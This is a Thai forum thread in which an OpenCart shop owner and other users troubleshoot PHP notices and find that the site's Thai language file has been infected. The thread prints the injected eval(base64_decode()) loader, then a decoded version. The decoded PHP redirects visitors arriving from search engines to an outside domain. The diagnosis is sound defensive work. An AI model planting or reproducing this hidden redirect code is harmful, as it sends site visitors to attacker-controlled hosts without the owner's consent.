ต่อไป »

[takaeshi]

ก่อนอื่นขอบอกก่อนว่า เคยตั้งกระทู้ลักษณะนี้มาแล้ว กรณี opencart ขึ้นโค๊ดเต้มหน้าเลย  เวลาเรากด enter  หลังลิงค์ แต่เมื่อเข้าไป admin  แล้วคลิกดูหน้าร้าน  หรือคลิ๊กมาตามลิงค์จะไม่เป็นอะไร หน้าจอไมมีโค๊ดอะไรแจ้งเลย   เกิดขึ้นเพราะอะไรครับ  ขอบคุณครับ

[iC1assicTh]

ก่อนอื่นขอบอกก่อนว่า เคยตั้งกระทู้ลักษณะนี้มาแล้ว กรณี opencart ขึ้นโค๊ดเต้มหน้าเลย  เวลาเรากด enter  หลังลิงค์ แต่เมื่อเข้าไป admin  แล้วคลิกดูหน้าร้าน  หรือคลิ๊กมาตามลิงค์จะไม่เป็นอะไร หน้าจอไมมีโค๊ดอะไรแจ้งเลย   เกิดขึ้นเพราะอะไรครับ  ขอบคุณครับ

ถอนปลั๊กอินออกก่อนครับ แล้วมาดูว่าหายไหม ถ้าหายก็มาไล่เปิดทีละตัว ก็จะรู้ว่ามาจากปลั๊กอินตัวไหน
(ผมตอบแบบอ่านไม่ค่อยเข้าใจ) จัดคำถามใหม่อีกหน่อยคงจะดี >_<" งงตั้งแต่ "เวลาเรากด enter  หลังลิงค์" ละ 

[adidog]

ดูเออเรอ เพราะตัวเออเรอจะบอกพาทไฟล์เลยว่าเออเรอจากอะไร

[tnt2524]

แคปหน้าจอเป็นตัวอย่างมาโชว์หน่อยสิครับ ท่านอื่นๆจะได้ตอบได้ตรงประเด็น

[takaeshi]

ผมทดลองกับลิงค์นี้ครับ  http://paratoys.tulanon.com/   ถ้าเราคลิ๊กตามลิงค์ไปเลย หรือมาจากหลังร้าน โดยการคลิ๊กที่ "ดูหน้าร้าน"  ไม่เป็นไรครับ  แต่ถ้าเอาลิงค์ไปวางแล้วกด enter โค๊ดจะขึ้นมาเลยครับ  ผมเคยเข้าไปลบโค๊ดแปลกๆ ที่จะขึ้นตามไฟล์ที่แจ้งอยู่ที่ละไฟล์ แล้วอัพไปทับใหม่ก็ปรากฎว่าดีได้แป๊บเดียว กลับมาเป็นเหมือนเดิมครับ

[vii]

เกิดจากไฟล์ module และไฟล์ภาษาที่คุณติดตั้ง เขาเขียนมาไม่ดีพอครับ
ตัวอย่าง

Notice: Undefined index: HTTP_REFERER in /home/parivart/domains/tulanon.com/public_html/paratoys/catalog/language/thai/thai.php(1) : eval()'d code on line 5

หมายความว่าในไฟล์ /home/parivart/domains/tulanon.com/public_html/paratoys/catalog/language/thai/thai.php บรรทัดที่ 5 มีปัญหา ให้ลองแก้ที่บรรทัดและไฟล์ดังกล่าว หรือลองเอาโค้ดตรงนั้นมาแปะ เดี๋ยวมีคนช่วยแนะนำให้ได้ครับ

[adidog]

โดนไวรัสหรือเปล่า พวกไฟล์ภาษาไม่มีการเรียกใช้ HTTP_REFERER แน่ๆครับ
จากเออเรอ

Notice: Undefined index: HTTP_REFERER in /home/parivart/domains/tulanon.com/public_html/paratoys/catalog/language/thai/thai.php(1)

ชัดเจนว่ามีโค้ดดัก referer อยู่ในไฟล์ภาษา เพราะปกติไฟล์ภาษาจะมีแต่อาเรย์ของภาษาเท่านั้นเอง ฟันธงว่าโดนไวรัสครับ  

[max30012540]

เป็นแค่ Notice ครับ (แจ้งเตือน)
ซึ่งแค่ตัวแปรไม่ประกาศก่อน มันก็ขึ้น 

สั่งปิดไปเลยครับ
hxxp://urll.us/zfWa9T

[iC1assicTh]

โดนไวรัสหรือเปล่า พวกไฟล์ภาษาไม่มีการเรียกใช้ HTTP_REFERER แน่ๆครับ
จากเออเรอ

Notice: Undefined index: HTTP_REFERER in /home/parivart/domains/tulanon.com/public_html/paratoys/catalog/language/thai/thai.php(1)

ชัดเจนว่ามีโค้ดดัก referer อยู่ในไฟล์ภาษา เพราะปกติไฟล์ภาษาจะมีแต่อาเรย์ของภาษาเท่านั้นเอง ฟันธงว่าโดนไวรัสครับ  

ผมว่าผู้แจก ใส่ใว้เองมั้งครับ เคยโหลดมาลอง แต่เจอ อะไรแปลกๆฝังใว้เยอะ เลยไม่ใว้ใจ - -*

[takaeshi]

<?php       eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikgYW5kICFzdHJzdHIoJHVhZywiRmlyZWZveC8zLiIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmcuIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlci4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInQuY28vIikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpIG9yIChwcmVnX21hdGNoICgiL2h0dHBzOlwvXC93d3cuZ29vZ2xlXC4oLio/KVwvLyIsJHJlZmVyZXIpIGFuZCBzdHJzdHIoJHVhZywiQ2hyb21lLyIpKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5kICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIpKXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3JrZmhhZmcuZGRucy5pbmZvLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));
// Locale
$_['code']                  = 'th';
$_['direction']             = 'ltr';
$_['date_format_short']     = 'd/m/Y';
...................................................................................................

^
^
^
แถวล่างสุดคือแถวที่ 5 ของไฟล์ catalog/language/thai/thai.php  และผมได้ไล่ลบโค๊ดเยอะๆ ด้านบนออกทุกไฟล์ที่แจ้งไว้แล้ว  แต่อีกไม่นานก็กลับมาเป็นเหมือนเดิมครับ  ขอบคุณครับ

[adidog]

ชัดเจนมาก โดนไวรัสแน่ๆ ผมก็ใช้เวอร์ชั่นนี้อยู่ของ opencart2004.com ที่แจกก็ไม่เจอแบบของท่าน

ลองdecodeดู

โค๊ด:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0") and !strstr($uag,"Firefox/3.")){
if (stristr($referer,"yahoo.") or stristr($referer,"bing.") or stristr($referer,"rambler.") or stristr($referer,"webalta.") or stristr($referer,"t.co/") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com") or (preg_match ("/https:\/\/www.google\.(.*?)\//",$referer) and strstr($uag,"Chrome/"))) {
if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
header("Location: http://rkfhafg.ddns.info/");
exit();
}
}
}
}
}

โค๊ด:

http://rkfhafg.ddns.info/

[takaeshi]

ชัดเจนมาก โดนไวรัสแน่ๆ ผมก็ใช้เวอร์ชั่นนี้อยู่ของ opencart2004.com ที่แจกก็ไม่เจอแบบของท่าน

ลองdecodeดู

โค๊ด:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0") and !strstr($uag,"Firefox/3.")){
if (stristr($referer,"yahoo.") or stristr($referer,"bing.") or stristr($referer,"rambler.") or stristr($referer,"webalta.") or stristr($referer,"t.co/") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com") or (preg_match ("/https:\/\/www.google\.(.*?)\//",$referer) and strstr($uag,"Chrome/"))) {
if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
header("Location: http://rkfhafg.ddns.info/");
exit();
}
}
}
}
}

โค๊ด:

http://rkfhafg.ddns.info/

นำโค๊ดนี้ไปใส่ในไฟล์ไหนครับ  ขอบคุณครับ

[adidog]

ผมลองแกะโค้ดที่เข้ารหัสดูเฉยๆครับว่ามันส่งแทรฟฟิคไปที่ไหน